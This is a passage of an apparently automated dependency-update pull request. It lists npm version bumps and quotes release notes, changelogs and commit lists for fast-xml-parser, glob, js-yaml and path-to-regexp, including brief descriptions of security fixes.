|\n| [glob](https://github.com/isaacs/node-glob) | `10.2.3` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [jsonpath](https://github.com/dchester/jsonpath) | `1.1.1` | `1.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `6.2.1` | `6.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `1.8.0` | `1.9.0` |\n| [express](https://github.com/expressjs/express) | `4.18.2` | `4.22.1` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.4` |\n| [gatsby](https://github.com/gatsbyjs/gatsby) | `4.23.1` | `4.25.9` |\n| [@babel/runtime-corejs3](https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3) | `7.13.9` | `7.29.2` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.21.5` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `11.4.4-cjs.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.8` | `1.1.12` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.2` | `1.15.11` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `3.3.3` | `3.3.5` |\n| [get-func-name](https://github.com/chaijs/get-func-name) | `2.0.0` | `2.0.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.17.23` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.3.11` | `8.5.8` |\n| [sharp](https://github.com/lovell/sharp) | `0.30.7` | `0.32.6` |\n| [svgo](https://github.com/svg/svgo) | `2.8.0` | `2.8.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 1 update in the /.github/actions/close-bot directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `fast-xml-parser` from 4.2.2 to 5.5.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/releases\"\u003efast-xml-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003efix entity expansion and incorrect replacement and performance\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003esupport onDangerousProperty\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eupdate dependecies to fix typings\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eintegrate path-expression-matcher\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport path-expression-matcher\u003c/li\u003e\n\u003cli\u003efix: stopNode should not be parsed\u003c/li\u003e\n\u003cli\u003eperformance improvement for stopNode checking\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eSeparate Builder\u003c/h2\u003e\n\u003cp\u003eXML Builder was the part of \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-builder\"\u003efast-xml-parser\u003c/a\u003e for years. But considering that any bug in builder may false-alarm the users who are only using parser and vice-versa, we have decided to split it into a separate package.\u003c/p\u003e\n\u003ch2\u003eMigration\u003c/h2\u003e\n\u003cp\u003eTo migrate to fast-xml-builder;\u003c/p\u003e\n\u003cp\u003eFrom\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { XMLBuilder } from \u0026quot;fast-xml-parser\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport  XMLBuilder  from \u0026quot;fast-xml-builder\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eXMLBuilder will be removed from current package in any next major version of this library. So better to migrate.\u003c/p\u003e\n\u003ch2\u003esupport strictReservedNames\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ehandle non-array input for XML builder \u0026amp;\u0026amp; support maxNestedTags\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle non-array input for XML builder when preserveOrder is true (By \u003ca href=\"https://github.com/Angelopvtac\"\u003eAngelo Coetzee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esave use of js properies\n\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCJS typing fix\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUnexport \u003ccode\u003eX2jOptions\u003c/code\u003e at declaration site by \u003ca href=\"https://github.com/Drarig29\"\u003e\u003ccode\u003e@​Drarig29\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/pull/787\"\u003eNaturalIntelligence/fast-xml-parser#787\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Drarig29\"\u003e\u003ccode\u003e@​Drarig29\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/pull/787\"\u003eNaturalIntelligence/fast-xml-parser#787\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md\"\u003efast-xml-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003eNote: If you find missing information about particular minor version, that version must have been changed without any functional change in this library.\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003cp\u003eNote: Due to some last quick changes on v4, detail of v4.5.3 \u0026amp; v4.5.4 are not updated here. v4.5.4x is the last tag of v4 in github repository. I'm extremely sorry for the confusion\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.6 / 2026-03-16\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate builder dependency\u003c/li\u003e\n\u003cli\u003efix incorrect regex to replace . in entity name\u003c/li\u003e\n\u003cli\u003efix check for entitiy expansion for lastEntities and html entities too\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.5 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esanitize dangerous tag or attribute name\u003c/li\u003e\n\u003cli\u003eerror on critical property name\u003c/li\u003e\n\u003cli\u003esupport onDangerousProperty option\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.4 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeclare Matcher \u0026amp; Expression as unknown so user is not forced to install path-expression-matcher\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.3 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade builder\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.2 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate dependency to fix typings\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.1 / 2026-03-10\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix dependency\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.0 / 2026-03-10\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport path-expression-matcher\u003c/li\u003e\n\u003cli\u003efix: stopNode should not be parsed\u003c/li\u003e\n\u003cli\u003eperformance improvement for stopNode checking\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.4.2 / 2026-03-03\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxEntityCount option\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.4.1  / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix (\u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/issues/785\"\u003e#785\u003c/a\u003e) unpairedTag node should not have tag content\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.4.0  / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003emigrate to fast-xml-builder\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.3.9 / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport strictReservedNames\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.3.8 / 2026-02-25\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle non-array input for XML builder when preserveOrder is true (By \u003ca href=\"https://github.com/Angelopvtac\"\u003eAngelo Coetzee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esave use of js properies\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.3.7 / 2026-02-20\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/870043e75e78545192bc70950c6286d36c7cdf23\"\u003e\u003ccode\u003e870043e\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/6df401ef2bb1d152313276add24cdfa860819751\"\u003e\u003ccode\u003e6df401e\u003c/code\u003e\u003c/a\u003e update builder dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01\"\u003e\u003ccode\u003ebd26122\u003c/code\u003e\u003c/a\u003e check for entitiy expansion for lastEntities and html entities too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/7e70dd8f758f3f494c4e14a281cea35b7d8d0d13\"\u003e\u003ccode\u003e7e70dd8\u003c/code\u003e\u003c/a\u003e fix incorrect regex to replace . in entity name\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/e54155f53048e9d58e27f170d3ccff15176b6671\"\u003e\u003ccode\u003ee54155f\u003c/code\u003e\u003c/a\u003e update package info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/3308fd7a45d9d74e87c6b6c4ef0574abaa1f8b65\"\u003e\u003ccode\u003e3308fd7\u003c/code\u003e\u003c/a\u003e handle critical properties\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/0500f6b4d66464fa70ecb58907804962c6b847f9\"\u003e\u003ccode\u003e0500f6b\u003c/code\u003e\u003c/a\u003e refactor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/ea07bb2e8435a88136c0e46d7ee8a345107b7582\"\u003e\u003ccode\u003eea07bb2\u003c/code\u003e\u003c/a\u003e declare Matcher \u0026amp; Expression as unknown\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/0a4dc92f979b5b03cfac2339ec7d81385edc14a8\"\u003e\u003ccode\u003e0a4dc92\u003c/code\u003e\u003c/a\u003e upgrade builder\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/e0a14f7d15a293732e630ce1b7faa39924de2359\"\u003e\u003ccode\u003ee0a14f7\u003c/code\u003e\u003c/a\u003e update dependency to fix typings\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/4.2.2...v5.5.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.2.3 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-glob/blob/main/changelog.md\"\u003eglob's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003echangeglob\u003c/h1\u003e\n\u003ch2\u003e13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMove the CLI program out to a separate package, \u003ccode\u003eglob-bin\u003c/code\u003e.\nInstall that if you'd like to continue using glob from the\ncommand line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove the unsafe \u003ccode\u003e--shell\u003c/code\u003e option. The \u003ccode\u003e--shell\u003c/code\u003e option is now\nONLY supported on known shells where the behavior can be\nimplemented safely.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.1\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\"\u003eGHSA-5j98-mcp5-4vw2\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--shell\u003c/code\u003e option for the command line, with a warning\nthat this is unsafe. (It will be removed in v12.)\u003c/li\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--cmd-arg\u003c/code\u003e/\u003ccode\u003e-g\u003c/code\u003e as a way to \u003cem\u003esafely\u003c/em\u003e add positional\narguments to the command provided to the CLI tool.\u003c/li\u003e\n\u003cli\u003eDetect commands with space or quote characters on known shells,\nand pass positional arguments to them safely, avoiding\n\u003ccode\u003eshell:true\u003c/code\u003e execution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node before v20\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eincludeChildMatches: false\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003eExport the \u003ccode\u003eIgnore\u003c/code\u003e class\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--default -p\u003c/code\u003e flag to provide a default pattern\u003c/li\u003e\n\u003cli\u003eexclude symbolic links to directories when \u003ccode\u003efollow\u003c/code\u003e and \u003ccode\u003enodir\u003c/code\u003e\nare both set\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd glob cli\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReturn \u003ccode\u003e'.'\u003c/code\u003e instead of the empty string \u003ccode\u003e''\u003c/code\u003e when the current\nworking directory is returned as a match.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eposix: true\u003c/code\u003e option to return \u003ccode\u003e/\u003c/code\u003e delimited paths, even on\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1f0c1ca01a5f256cd17f543f83e9aaeedd133939\"\u003e\u003ccode\u003e1f0c1ca\u003c/code\u003e\u003c/a\u003e 10.4.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eaf31dcb144750a19842a8319c330d021d4c4d5f\"\u003e\u003ccode\u003eeaf31dc\u003c/code\u003e\u003c/a\u003e whatever, just allow any engines\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/78275168e1bbc7a61e372af1ba58307c27faf0cb\"\u003e\u003ccode\u003e7827516\u003c/code\u003e\u003c/a\u003e 10.4.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/d06c8f8c8288c89a4892f4ebcc23ca21840aa4a1\"\u003e\u003ccode\u003ed06c8f8\u003c/code\u003e\u003c/a\u003e restore support for node 14.latest and 16.latest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c14b787771f269651f27f6207aaf410fe171f0b6\"\u003e\u003ccode\u003ec14b787\u003c/code\u003e\u003c/a\u003e 10.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/8a69def3cad0de9ba26ca831065ffe448d153de3\"\u003e\u003ccode\u003e8a69def\u003c/code\u003e\u003c/a\u003e node 14 no longer supported\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eef7ea35afe511079c5bf83862ed57ece2bbf7fa\"\u003e\u003ccode\u003eeef7ea3\u003c/code\u003e\u003c/a\u003e 10.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c76a7d255c74133ed33dd7aa965598316d12dd25\"\u003e\u003ccode\u003ec76a7d2\u003c/code\u003e\u003c/a\u003e use package-json-from-dist to look up package.json\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.2.3...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsonpath` from 1.1.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/dchester/jsonpath/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 6.2.1 to 6.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 